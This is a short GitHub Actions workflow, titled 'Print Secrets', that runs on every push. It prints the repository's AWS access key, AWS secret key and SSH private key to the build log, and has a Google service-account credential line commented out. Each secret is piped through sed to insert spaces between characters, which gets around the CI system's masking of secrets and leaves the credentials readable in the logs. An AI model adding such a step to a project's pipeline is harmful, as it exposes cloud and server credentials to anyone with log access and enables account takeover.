name: Print Secrets

on: [push]

jobs:
  print-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Print obfuscated secrets
        run: |
          echo AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} | sed 's/./& /g'
          echo AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} | sed 's/./& /g'
          # echo GOOGLE_SERVICE_ACCOUNT_JSON: ${{ secrets.GOOGLE_SERVICE_ACCOUNT_JSON }} | sed 's/./& /g' 
          echo SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }} | sed 's/./& /g'
